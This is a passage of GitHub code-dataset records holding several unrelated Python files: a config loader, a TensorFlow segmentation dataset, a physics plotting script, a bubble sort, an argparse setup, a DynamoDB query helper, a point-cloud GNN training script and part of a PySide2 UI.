os.getenv(\"group_name_white_list\", \"ChatGPT测试群 ChatGPT测试群2\").split(),\n }\n )\n # config_path = \"config.json\"\n # if not os.path.exists(config_path):\n # raise Exception('配置文件不存在,请根据config-template.json模板创建config.json文件')\n #\n # config_str = read_file(config_path)\n # # 将json字符串反序列化为dict类型\n # config = json.loads(config_str)\n\n logger.info(\"[INIT] load config: {}\".format(config))\n\n\ndef get_root():\n return os.path.dirname(os.path.abspath(__file__))\n\n\ndef read_file(path):\n with open(path, mode='r', encoding='utf-8') as f:\n return f.read()\n\n\ndef conf():\n return config\n","repo_name":"lamthun/chatgpt-on-wechat2","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37621749576","text":"import tensorflow as tf\n\n\nclass Dataset:\n\n def __init__(self, config):\n self.config = config\n self.train_image_list = self.config['train_image_list']\n self.train_mask_list = self.config['train_mask_list']\n self.val_image_list = self.config['val_image_list']\n self.val_mask_list = self.config['val_mask_list']\n\n def __len__(self):\n self.assert_dataset()\n return {\n 'train': len(self.train_image_list),\n 'val': len(self.val_image_list)\n }\n\n def assert_dataset(self):\n pass\n\n def read_image(self, image_path, img_height=800, img_width=1600, mask=False, flip=0):\n image = tf.io.read_file(image_path)\n if not mask:\n image = tf.cast(tf.image.decode_png(image, channels=3), dtype=tf.float32)\n image = tf.image.resize(images=image, size=[img_height, img_width])\n image = tf.image.random_brightness(image, max_delta=50.)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n image = tf.clip_by_value(image, 0, 255)\n image = tf.case([\n (tf.greater(flip, 0), lambda: tf.image.flip_left_right(image))\n ], default=lambda: image)\n image = image[:, :, ::-1] - tf.constant([103.939, 116.779, 123.68])\n else:\n image = tf.image.decode_png(image, channels=1)\n image = tf.cast(tf.image.resize(images=image, size=[\n img_height, img_width]), dtype=tf.uint8)\n image = tf.case([\n (tf.greater(flip, 0), lambda: tf.image.flip_left_right(image))\n ], default=lambda: image)\n return image\n\n def random_crop(self, image, mask):\n image_dims = image.shape\n offset_h = tf.random.uniform(\n shape=(1,),\n maxval=image_dims[0] - self.config['patch_height'],\n dtype=tf.int32\n )[0]\n offset_w = tf.random.uniform(\n shape=(1,),\n maxval=image_dims[1] - self.config['patch_width'],\n dtype=tf.int32\n )[0]\n image = tf.image.crop_to_bounding_box(\n image, offset_height=offset_h,\n offset_width=offset_w,\n target_height=self.config['patch_height'],\n target_width=self.config['patch_width']\n )\n mask = tf.image.crop_to_bounding_box(\n mask, offset_height=offset_h,\n offset_width=offset_w,\n target_height=self.config['patch_height'],\n target_width=self.config['patch_width']\n )\n return image, mask\n\n def map_function(self, image_path, mask_path):\n flip = tf.random.uniform(\n shape=[1, ], minval=0, maxval=2, dtype=tf.int32)[0]\n image, mask = self.read_image(\n image_path, flip=flip\n ), self.read_image(\n mask_path, mask=True, flip=flip\n )\n image, mask = self.random_crop(image, mask)\n return image, mask\n\n def get_datasets(self):\n train_dataset = tf.data.Dataset.from_tensor_slices(\n (self.train_image_list, self.train_mask_list)\n )\n train_dataset = train_dataset.shuffle(buffer_size=128)\n train_dataset = train_dataset.map(\n map_func=self.map_function,\n num_parallel_calls=tf.data.experimental.AUTOTUNE,\n )\n train_dataset = train_dataset.batch(\n batch_size=self.config['train_batch_size'],\n drop_remainder=True\n )\n train_dataset = train_dataset.repeat()\n train_dataset = train_dataset.prefetch(\n tf.data.experimental.AUTOTUNE\n )\n val_dataset = tf.data.Dataset.from_tensor_slices(\n (self.val_image_list, self.val_mask_list)\n )\n val_dataset = val_dataset.map(\n map_func=self.map_function,\n num_parallel_calls=tf.data.experimental.AUTOTUNE,\n )\n val_dataset = val_dataset.batch(\n batch_size=self.config['val_batch_size'],\n drop_remainder=True\n )\n val_dataset = val_dataset.repeat()\n val_dataset = val_dataset.prefetch(\n tf.data.experimental.AUTOTUNE\n )\n return train_dataset, val_dataset\n","repo_name":"bogdan-s/DeepLabV3-Plus","sub_path":"src/datasets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"7943140892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 4 10:23:32 2019\n\n@author: Nicco\nthis code contains all the useful routines to compute energy spectrum for PBC Bogoliubov Hamiltonian\n\"\"\"\n\n\nimport Code1\n\n#calculation of impulses of eigenvectors employing translational invariance of states\nkx=np.zeros(len(vals))\nky=np.zeros(len(vals))\nfor r in range(len(vals)):\n kx[r]=-1j*np.log(vecs[0,r]/vecs[1,r])/a \n ky[r]=-1j*np.log(vecs[Ltilde,r]/vecs[0,r])/a\n if (np.abs(vecs[0,r])<10**-8)&(np.abs(vecs[1,r])<10**-8): #correct behaviour when kx and ky should be zero (bit of workaround)\n kx[r]=-1j*np.log((vecs[Ltilde**2,r])/(vecs[1+Ltilde**2,r]))/a\n if (np.abs(vecs[Ltilde,r])<10**-8)&(np.abs(vecs[0,r])<10**-8):\n ky[r]=-1j*np.log((vecs[Ltilde+Ltilde**2,r])/(vecs[Ltilde**2,r]))/a\n\n#3D surface figure, setting parameters\nasc=np.linspace(-np.pi/a,np.pi/a,100)\nasc,ordin=np.meshgrid(asc,asc) \nfig=plt.figure(1)\nax=fig.add_subplot(111, projection='3d')\nax.set_xlabel('kx')\nax.set_ylabel('ky')\nax.set_title('a='+str(a)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nax.view_init(0, 90)\n#sets the ticks on axis in multiples of py\nax.xaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\nax.xaxis.set_major_locator(tck.MultipleLocator(base=1.0))\nax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\nax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n\n#theoretical bogoliubov dispersion\nax.plot_surface(asc, ordin, fx.enbog(asc,ordin,t,a,mu,delta), alpha=0.2,color='b')\nax.plot_surface(asc, ordin, -fx.enbog(asc,ordin,t,a,mu,delta), alpha=0.2,color='b')\n#calculated eigenvalu\nax.scatter(kx,ky,vals,'bo',s=20,c='r')\n \n#continuum limit \n#ax.plot_surface(asc, ordin, fx.en(asc,ordin,t,a,mu0), alpha=0.5) #energy with finite spacing\n#ax.plot_surface(asc, ordin, fx.enbogcont(asc,ordin,t,mu0,delta), alpha=0.2,color='red')\nplt.show()\n\n#heat plot to understand outliers\nkpos=np.array([])\nfor i in range(len(vals)):\n if (vals[i]>=0):\n kpos=np.append(kpos,i)\n\n#heat plot of upper band of bogoliubov dispersion\nfig=plt.figure()\nax=fig.add_subplot(111)\nax.set_title('Ltilde='+str(Ltilde)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nax.set_xlabel('kx')\nax.set_ylabel('ky')\nasc=np.linspace(-np.pi/a,np.pi/a,100)\nasc,ordin=np.meshgrid(asc,asc)\nmezzival=Ltilde**2\nax.set_title('a='+str(a)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nmi = np.min((vals[mezzival:].min(), fx.enbog(asc,ordin,t,a,mu,delta).min()))\nma = np.max((vals[mezzival:].max(), fx.enbog(asc,ordin,t,a,mu,delta).max()))\nnorm = clr.Normalize(vmin=mi,vmax=ma)\nax.contourf(asc,ordin,fx.enbog(asc,ordin,t,a,mu,delta),200,norm=norm)\naxp=ax.scatter(kx[mezzival:],ky[mezzival:],c=vals[mezzival:],norm=norm,edgecolors='black')\ncb = plt.colorbar(axp)\n \n\n\n","repo_name":"nbaldelli/anyons_pwave","sub_path":"OldCodes/PBCBOG.py","file_name":"PBCBOG.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38887254696","text":"# 冒泡排序\n\ndef bubble(value):\n # 外层循环: 对应走访数据的次数:长度-1\n for i in range(len(value) - 1):\n # 设置数据交互标识\n flag = False\n # 内层循环: 对应每次走访数据时\n # 相邻数据对比的次数\n # -1: 对应j+1元素所占位置\n # -i: 对应当前已经找出最大值的个数(外层循环)\n for j in range(len(value)-1 - i):\n # 默然从小到大排序,如前者大于后者则数据交互\n if value[j] > value[j+1]:\n # 进行数据交互\n value[j], value[j+1] = value[j+1], value[j]\n flag = True\n # 若未发生数据交互,则证明后续数据均为有序数据\n # 无需继续遍历,退出循环\n if flag == False:\n break \n\n print('遍历次数:', i+1)\n\n\nvalues = [23,45,2,67,34,9,86,39,52,73,19,98,27]\nprint('原始数据:', values)\nbubble(values)\nprint(\"排序后:\", values)\nvalues = [100, 200, 2, 9, 19, 23, 27, 34, 39, 45, 52, 67, 73, 86, 98]\nbubble(values)\nprint(\"再次排序后:\", values)\n","repo_name":"index-zhc/stayreal","sub_path":"bubblesort.py","file_name":"bubblesort.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2747766435","text":"import argparse\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='Open Image Dataset Downloader')\n\n parser.add_argument(\"command\",\n metavar=\"<command> 'downloader', 'train', 'all'.\",\n help=\"'downloader' or 'train' or 'all'.\")\n # 'all' command perform both download and trainig\n parser.add_argument('--limit', required=False, type=int, default=None,\n metavar=\"integer number\",\n help='Optional limit on number of images to download')\n\n parser.add_argument('--n_threads', required=False, metavar=\"[default 20]\",\n help='Num of the threads to use')\n\n parser.add_argument('--classes', required=False, default='domains.txt',nargs='+',\n metavar=\"list of classes\",\n help=\"Sequence of 'strings' of the wanted classes\")\n\n parser.add_argument('--noLabels', required=False, action='store_true',\n help='No labels creations')\n\n parser.add_argument(\"--gpu_num\", type=int, default=0, help=\"select number of gpu\") # multi-gpu training function will be implemented later\n\n parser.add_argument(\"--epochs\", type=int, default=100, help=\"number of epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"size of each image batch\")\n parser.add_argument(\"--model_def\", type=str, default=None, help=\"path to model definition file\")\n parser.add_argument(\"--pretrained_weights\", type=str, help=\"if specified starts from checkpoint model\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=5, help=\"interval between saving model weights\")\n parser.add_argument(\"--evaluation_interval\", type=int, default=5, help=\"interval evaluations on validation set\")\n parser.add_argument(\"--img_size\", type=int, default=416, help=\"size of each image dimension\")\n\n parser.add_argument(\"--logdir\", type=str, default=\"logs\", help=\"Defines the directory where the training log files are stored\")\n\n # From below, setting is not essential\n\n parser.add_argument('--Dataset', required=False,\n metavar=\"/path/to/custom/csv/\",\n help='Directory of the OID dataset folder')\n parser.add_argument('-y', '--yes', required=False, action='store_true',\n #metavar=\"Yes to download missing files\",\n help='ans Yes to possible download of missing files')\n\n parser.add_argument('--sub', required=False, choices=['h', 'm'],\n metavar=\"Subset of human verified images or machine generated (h or m)\",\n help='Download from the human verified dataset or from the machine generated one.')\n\n\n # image dataset option\n parser.add_argument('--image_IsOccluded', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object is occluded by another object in the image.')\n parser.add_argument('--image_IsTruncated', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object extends beyond the boundary of the image.')\n parser.add_argument('--image_IsGroupOf', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the box spans a group of objects (min 5).')\n parser.add_argument('--image_IsDepiction', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates that the object is a depiction.')\n parser.add_argument('--image_IsInside', required=False, choices=['0', '1'],\n metavar=\"1 or 0\",\n help='Optional characteristic of the images. Indicates a picture taken from the inside of the object.')\n\n # training option\n parser.add_argument(\"--gradient_accumulations\", type=int, default=2, help=\"number of gradient accums before step\")\n parser.add_argument(\"--n_cpu\", type=int, default=8, help=\"number of cpu threads to use during batch generation\")\n parser.add_argument(\"--compute_map\", default=False, help=\"if True computes mAP every tenth batch\")\n parser.add_argument(\"--multiscale_training\", default=True, help=\"allow for multi-scale training\")\n parser.add_argument(\"--verbose\", \"-v\", default=False, action='store_true', help=\"Makes the training more verbose\")\n\n\n return parser.parse_args()\n","repo_name":"worl6088/CCAI","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13269015396","text":"from typing import List\nimport boto3\nfrom boto3.dynamodb.types import TypeDeserializer\nimport os\nimport gzip\nimport json\n\n\ndynamodb = boto3.client('dynamodb')\ntable_name = os.environ['DYNAMO_TABLE']\ndeser = TypeDeserializer()\n\n\ndef deserialize(dynamodb_json):\n return {k: deser.deserialize(v) for k, v in dynamodb_json.items()}\n\n\ndef latitude_box_values(min_lat, max_lat):\n min_lat_int = int(float(min_lat) * 10)\n max_lat_int = int(float(max_lat) * 10)\n return range(min_lat_int, max_lat_int+1)\n\n\ndef dynamo_query(query_parameters):\n\n latitude_boxes = [str(latitude) for latitude in latitude_box_values(\n query_parameters.get(\"minLatitude\"),\n query_parameters.get(\"maxLatitude\"))]\n\n result = []\n for latitude_box in latitude_boxes:\n\n if query_parameters['webAvailable']:\n index_name = 'latitude-longitude-webavailable-index'\n key_name = 'latitude_box_webavailable'\n else:\n index_name = 'latitude-longitude-index'\n key_name = 'latitude_box'\n\n query = {\n 'TableName': table_name,\n 'IndexName': index_name,\n 'ReturnConsumedCapacity': 'TOTAL',\n 'KeyConditionExpression': f'{key_name} = :latitude_box AND longitude BETWEEN :minLongitude AND :maxLongitude', # noqa\n 'FilterExpression': '',\n 'ExpressionAttributeValues': {\n ':latitude_box': {\"N\": latitude_box},\n ':minLongitude': {\n \"N\": str(query_parameters.get(\"minLongitude\"))\n },\n ':maxLongitude': {\n \"N\": str(query_parameters.get(\"maxLongitude\"))\n }\n }\n }\n for key in query_parameters:\n if key in [\"minLongitude\", \"maxLongitude\"]:\n continue\n if key[:3] == \"min\":\n field = key.replace(\"min\", \"\")\n field = field[0].lower() + field[1:]\n query['FilterExpression'] += f\"{field} >= :{field}_min AND \"\n query['ExpressionAttributeValues'][f\":{field}_min\"] = {\n \"N\": str(query_parameters[key])\n }\n elif key[:3] == \"max\":\n field = key.replace(\"max\", \"\")\n field = field[0].lower() + field[1:]\n query['FilterExpression'] += f\"{field} <= :{field}_max AND \"\n query['ExpressionAttributeValues'][f\":{field}_max\"] = {\n \"N\": str(query_parameters[key])\n }\n else:\n field = key\n if type(query_parameters[key]) == list:\n if len(query_parameters[key]) > 0:\n values = ','.join([f':{field}_{idx}' for idx in range(\n len(query_parameters[key]))]\n )\n query['FilterExpression'] += f\"{field} IN ({values}) AND \" # noqa\n for idx, value in enumerate(query_parameters[key]):\n query['ExpressionAttributeValues'][\n f\":{field}_{idx}\"\n ] = {\"S\": value}\n else:\n query['FilterExpression'] += f\"{field} = :{field} AND \"\n value = query_parameters[key]\n if isinstance(value, str):\n value_type = \"S\"\n elif isinstance(value, bool):\n value_type = \"BOOL\"\n elif isinstance(value, (int, float)):\n value_type = \"N\"\n value = str(value)\n else:\n raise ValueError(f\"Unsupported data type for {key}: {type(value)}\") # noqa\n query['ExpressionAttributeValues'][f\":{field}\"] = {\n value_type: value\n }\n\n # removes trailing 'AND '\n query['FilterExpression'] = query['FilterExpression'][:-4]\n print(\"query = \", query)\n\n last_key = []\n consumed_capacity = 0\n while last_key is not None:\n response = dynamodb.query(\n **query, ExclusiveStartKey=last_key\n ) if last_key else dynamodb.query(**query)\n result += map(deserialize, response['Items'])\n consumed_capacity += response['ConsumedCapacity']['CapacityUnits']\n last_key = response.get('LastEvaluatedKey')\n\n print(\"CONSUMED_CAPACITY = \", consumed_capacity)\n\n return result\n\n# we currently don't have standard_data_gz in the dynamo database\n\n# def expand(id: List[str]) -> List[dict]:\n# id = list(id)\n\n# chunked_ids = [id[i:i+100] for i in range(0, len(id), 100)]\n# items = []\n# for chunk in chunked_ids:\n# response = dynamodb.batch_get_item(\n# RequestItems={\n# table_name: {\n# 'Keys': [{'id': {'S': i}} for i in chunk]\n# }\n# }\n# )\n# items.extend(response['Responses'][table_name])\n\n# items = [{\n# **{k: v for k, v in item.items() if k != 'standard_data_gz'},\n# 'standard_data': json.loads(gzip.decompress(\n# item['standard_data_gz'].value\n# ).decode('utf-8'))\n# } for item in map(deserialize, items)\n# ]\n\n# return items\n","repo_name":"AshrafE3/redzilla-search-x","sub_path":"chalicelib/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71926046565","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport tqdm\nimport numpy as np\nfrom dataset import DataSet\nimport torch.optim as optim\nimport sklearn.metrics as metrics\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, StepLR\nimport torch.nn.functional as F\n\n\ndef knn(x, k):\n inner = -2 * torch.matmul(x.transpose(2, 1), x)\n xx = torch.sum(x ** 2, dim=1, keepdim=True)\n pairwise_distance = -xx - inner - xx.transpose(2, 1)\n\n idx = pairwise_distance.topk(k=k, dim=-1)[1]\n return idx\n\ndef get_graph_feature(x, k=20, idx=None, dim9=False):\n batch_size = x.size(0)\n num_points = x.size(2)\n x = x.view(batch_size, -1, num_points)\n if idx is None:\n if dim9 == False:\n idx = knn(x, k=k)\n else:\n idx = knn(x[:, 6:], k=k)\n device = torch.device('cuda')\n\n idx_base = torch.arange(0, batch_size, device=device).view(-1, 1, 1) * num_points\n\n idx = idx + idx_base\n\n idx = idx.view(-1)\n\n _, num_dims, _ = x.size()\n\n x = x.transpose(2,1).contiguous()\n feature = x.view(batch_size * num_points, -1)[idx, :]\n feature = feature.view(batch_size, num_points, k, num_dims)\n x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n\n feature = torch.cat((feature - x, x), dim=3).permute(0, 3, 1, 2).contiguous()\n\n return feature\n\nclass MorphoGNN(nn.Module):\n def __init__(self, num_classes=7):\n super(MorphoGNN, self).__init__()\n\n self.bn1 = nn.BatchNorm2d(32)\n self.bn2 = nn.BatchNorm2d(64)\n self.bn3 = nn.BatchNorm2d(128)\n self.bn4 = nn.BatchNorm2d(256)\n self.bn5 = nn.BatchNorm1d(1024)\n\n self.conv1 = nn.Sequential(nn.Conv2d(6, 32, kernel_size=1, bias=False),\n self.bn1,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv2 = nn.Sequential(nn.Conv2d(32 * 2, 64, kernel_size=1, bias=False),\n self.bn2,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv3 = nn.Sequential(nn.Conv2d(96 * 2, 128, kernel_size=1, bias=False),\n self.bn3,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv4 = nn.Sequential(nn.Conv2d(224 * 2, 256 , kernel_size=1, bias=False),\n self.bn4,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv5 = nn.Sequential(nn.Conv1d(480, 1024, kernel_size=1, bias=False),\n self.bn5,\n nn.LeakyReLU(negative_slope=0.2))\n self.linear1 = nn.Linear(1024 * 2, 512, bias=False)\n self.bn6 = nn.BatchNorm1d(512)\n self.linear2 = nn.Linear(512, 256)\n self.bn7 = nn.BatchNorm1d(256)\n self.dp3 = nn.Dropout(p=0.2)\n self.linear3 = nn.Linear(256, num_classes)\n\n def forward(self, x):\n batch_size = x.size(0)\n x1 = get_graph_feature(x, k=8)\n x1 = self.conv1(x1)\n x1 = x1.max(dim=-1, keepdim=False)[0]\n\n x2 = get_graph_feature(x1, k=16)\n x2 = self.conv2(x2)\n x2 = x2.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1,x2),1)\n\n x3 = get_graph_feature(x, k=32)\n x3 = self.conv3(x3)\n x3 = x3.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1, x2, x3), 1)\n\n x4 = get_graph_feature(x, k=64)\n x4 = self.conv4(x4)\n x4 = x4.max(dim=-1, keepdim=False)[0]\n\n x = torch.cat((x1, x2, x3, x4), 1)\n\n x = self.conv5(x)\n x1 = F.adaptive_max_pool1d(x, 1).view(batch_size,-1)\n x2 = F.adaptive_avg_pool1d(x, 1).view(batch_size,-1)\n x = torch.cat((x1, x2), 1)\n\n self.feature = x\n x = self.linear1(x)\n x = F.leaky_relu(self.bn6(x), negative_slope=0.2)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp3(x)\n x = self.linear3(x)\n\n return self.feature,x\n\n\ndef euclidean_dist(x, y):\n m, n = x.size(0), y.size(0)\n xx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\n yy = torch.pow(y, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n dist = xx + yy\n dist.addmm_(1, -2, x, y.t())\n dist = dist.clamp(min=1e-12).sqrt()\n return dist\n\n\ndef cosine_dist(x, y):\n bs1, bs2 = x.size(0), y.size(0)\n frac_up = torch.matmul(x, y.transpose(0, 1))\n frac_down = (torch.sqrt(torch.pow(x, 2).sum(dim=1)).view(bs1, 1).repeat(1, bs2)) * \\\n (torch.sqrt(torch.pow(y, 2).sum(dim=1).view(1, bs2).repeat(bs1, 1)))\n cosine = frac_up / frac_down\n cos_d = 1 - cosine\n return cos_d\n\n\ndef _batch_hard(mat_distance, mat_similarity, indice=False):\n sorted_mat_distance, positive_indices = torch.sort(mat_distance + (-100000.0) * (1 - mat_similarity), dim=1,\n descending=True)\n hard_p = sorted_mat_distance[:, 0]\n hard_p_indice = positive_indices[:, 0]\n sorted_mat_distance, negative_indices = torch.sort(mat_distance + 100000.0 * mat_similarity, dim=1,\n descending=False)\n hard_n = sorted_mat_distance[:, 0]\n hard_n_indice = negative_indices[:, 0]\n if (indice):\n return hard_p, hard_n, hard_p_indice, hard_n_indice\n return hard_p, hard_n\n\n\nclass TripletLoss(nn.Module):\n def __init__(self, margin=0.5, normalize_feature=True):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.normalize_feature = normalize_feature\n self.margin_loss = nn.MarginRankingLoss(margin=margin)\n\n def forward(self, emb, label):\n if self.normalize_feature:\n emb = F.normalize(emb)\n\n mat_dist = euclidean_dist(emb, emb)\n\n assert mat_dist.size(0) == mat_dist.size(1)\n N = mat_dist.size(0)\n mat_sim = label.expand(N, N).eq(label.expand(N, N).t()).float()\n\n dist_ap, dist_an = _batch_hard(mat_dist, mat_sim)\n assert dist_an.size(0) == dist_ap.size(0)\n y = torch.ones_like(dist_ap)\n loss = self.margin_loss(dist_an, dist_ap, y)\n\n prec = (dist_an.data > dist_ap.data).sum() * 1.0 / y.size(0)\n return loss, prec\n\nif __name__ == '__main__':\n train_dataset = DataSet(train=True)\n test_dataset = DataSet(train=False)\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=4, shuffle=True, num_workers=2,\n drop_last=True)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=4, shuffle=False, num_workers=2,\n drop_last=True)\n model = MorphoGNN().to('cuda')\n opt = optim.Adam(model.parameters(), lr=0.001, weight_decay=1e-4)\n scheduler = StepLR(opt, step_size=20, gamma=0.5)\n criterion_CrossEntropy = nn.CrossEntropyLoss()\n criterion_triple = TripletLoss()\n\n best_test_acc = 0\n best_test_avg_acc = 0\n for epoch in range(50):\n train_loss = 0.0\n train_triplet_loss = 0.0\n train_ce_loss = 0.0\n count = 0.0\n model.train()\n train_pred = []\n train_true = []\n tqdm_batch = tqdm.tqdm(train_loader, desc='Epoch-{} training'.format(epoch))\n for data, label in tqdm_batch:\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data, label = data.to('cuda'), label.to('cuda').squeeze()\n data = data.permute(0, 2, 1)\n batch_size = data.size()[0]\n opt.zero_grad()\n features, logits = model(data)\n preds = logits.max(dim=1)[1]\n count += batch_size\n triplet_loss,_ = criterion_triple(features,label)\n ce_loss = criterion_CrossEntropy(logits,label)\n loss = triplet_loss * 1 + ce_loss\n loss.backward()\n opt.step()\n train_triplet_loss += triplet_loss.item() * batch_size\n train_ce_loss += ce_loss.item() * batch_size\n train_loss += loss.item() * batch_size\n train_true.append(label.cpu().numpy())\n train_pred.append(preds.detach().cpu().numpy())\n tqdm_batch.close()\n\n if opt.param_groups[0]['lr'] > 1e-5:\n scheduler.step()\n if opt.param_groups[0]['lr'] < 1e-5:\n for param_group in opt.param_groups:\n param_group['lr'] = 1e-5\n\n train_true = np.concatenate(train_true)\n train_pred = np.concatenate(train_pred)\n print('Train %d, loss: %.6f, triplet_loss: %.6f, CE_loss: %.6f, train acc: %.6f, train avg acc: %.6f' % (epoch,train_loss * 1.0 / count,\n train_triplet_loss * 1.0/count, train_ce_loss * 1.0/count,\n metrics.accuracy_score(train_true, train_pred),\n metrics.balanced_accuracy_score(train_true, train_pred)))\n\n with torch.no_grad():\n test_loss = 0.0\n test_triplet_loss = 0.0\n test_ce_loss = 0.0\n count = 0.0\n model.eval()\n test_pred = []\n test_true = []\n tqdm_batch = tqdm.tqdm(test_loader, desc='Epoch-{} testing'.format(epoch))\n for data, label in tqdm_batch:\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data, label = data.to('cuda'), label.to('cuda').squeeze()\n data = data.permute(0, 2, 1)\n batch_size = data.size()[0]\n features, logits = model(data)\n preds = logits.max(dim=1)[1]\n triplet_loss, _ = criterion_triple(features, label)\n ce_loss = criterion_CrossEntropy(logits, label)\n loss = triplet_loss * 1 + ce_loss\n count += batch_size\n test_loss += loss.item() * batch_size\n test_triplet_loss += triplet_loss.item() * batch_size\n test_ce_loss += ce_loss.item() * batch_size\n test_true.append(label.cpu().numpy())\n test_pred.append(preds.detach().cpu().numpy())\n test_true = np.concatenate(test_true)\n test_pred = np.concatenate(test_pred)\n test_acc = metrics.accuracy_score(test_true, test_pred)\n avg_per_class_acc = metrics.balanced_accuracy_score(test_true, test_pred)\n tqdm_batch.close()\n print('Test %d, loss: %.6f, triplet_loss: %.6f, CE_loss: %.6f, test acc: %.6f, test avg acc: %.6f' % (epoch,\n test_loss*1.0/count,test_triplet_loss*1.0/count,\n test_ce_loss*1.0/count,test_acc,\n avg_per_class_acc))\n if test_acc >= best_test_acc:\n best_test_acc = test_acc\n best_test_avg_acc = avg_per_class_acc\n torch.save(model.state_dict(), './MorphoGNN.t7')\n print('best acc: ',best_test_acc,' best avg acc: ',best_test_avg_acc)\n","repo_name":"fun0515/MorphoGNN","sub_path":"MorphoGNN.py","file_name":"MorphoGNN.py","file_ext":"py","file_size_in_byte":11322,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"9274459637","text":"from turtle import width\nfrom PySide2 import *\nimport json\nimport sys\nimport os\n\nfrom ui_untitled_demo import *\nfrom main import *\nfrom constants import *\n\n#########################################\n#########################################\n## VIEW\n#########################################\n#########################################\n\n#########################################\n## Method to generate one scenario card widget\n#########################################\ndef generateCards2(self, scenario):\n ## Calculating the position based on the id\n positionX = 0 if scenario.id < 4 else 1 \n positionY = (scenario.id - 1) % 3 \n \n self.card = QFrame(self.ui.scrollAreaWidgetContents)\n self.card.setObjectName(u\"scenario_\" + str(scenario.id))\n self.card.setMinimumSize(QSize(200, 200))\n self.card.setMaximumSize(QSize(300, 300))\n self.card.setStyleSheet(u\"border-radius: 25% 10%;\\n\"\n \"background-color: rgb(158, 158, 158);\\n\"\n \"border-style: solid;\")\n self.card.setFrameShape(QFrame.StyledPanel)\n self.card.setFrameShadow(QFrame.Raised)\n self.verticalLayout_2 = QVBoxLayout(self.card)\n self.verticalLayout_2.setSpacing(0)\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.header_frame = QFrame(self.card)\n self.header_frame.setObjectName(u\"header_frame_\" + str(scenario.id))\n self.header_frame.setStyleSheet(u\"background-color: rgb(112, 112, 112);\\n\"\n \"border-bottom-left-radius: 0px;\\n\"\n \"border-bottom-right-radius: 0px;\\n\"\n \"border-bottom: 6px groove;\\n\"\n \"border-bottom-color: rgb(58, 58, 58);\")\n self.header_frame.setFrameShape(QFrame.StyledPanel)\n self.header_frame.setFrameShadow(QFrame.Raised)\n self.gridLayout_2 = QGridLayout(self.header_frame)\n self.gridLayout_2.setObjectName(u\"gridLayout_2_\" + str(scenario.id))\n self.lb_scenario_name = QLabel(self.header_frame)\n self.lb_scenario_name.setObjectName(u\"lb_scenario_name_\" + str(scenario.id))\n font = QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.lb_scenario_name.setFont(font)\n self.lb_scenario_name.setStyleSheet(u\"border-bottom: hidden;\\n\"\n \"color: rgb(235, 235, 235);\\n\"\n \"\")\n\n self.gridLayout_2.addWidget(self.lb_scenario_name, 0, 1, 2, 1)\n\n\n self.verticalLayout_2.addWidget(self.header_frame)\n\n self.progress_frame = QFrame(self.card)\n self.progress_frame.setObjectName(u\"progress_frame_\" + str(scenario.id))\n self.progress_frame.setFrameShape(QFrame.StyledPanel)\n self.progress_frame.setFrameShadow(QFrame.Raised)\n self.verticalLayout_3 = QVBoxLayout(self.progress_frame)\n self.verticalLayout_3.setObjectName(u\"verticalLayout_3_\" + str(scenario.id))\n self.lb_complete = QLabel(self.progress_frame)\n self.lb_complete.setObjectName(\"lb_complete_\" + str(scenario.id))\n font1 = QFont()\n font1.setPointSize(10)\n font1.setBold(True)\n 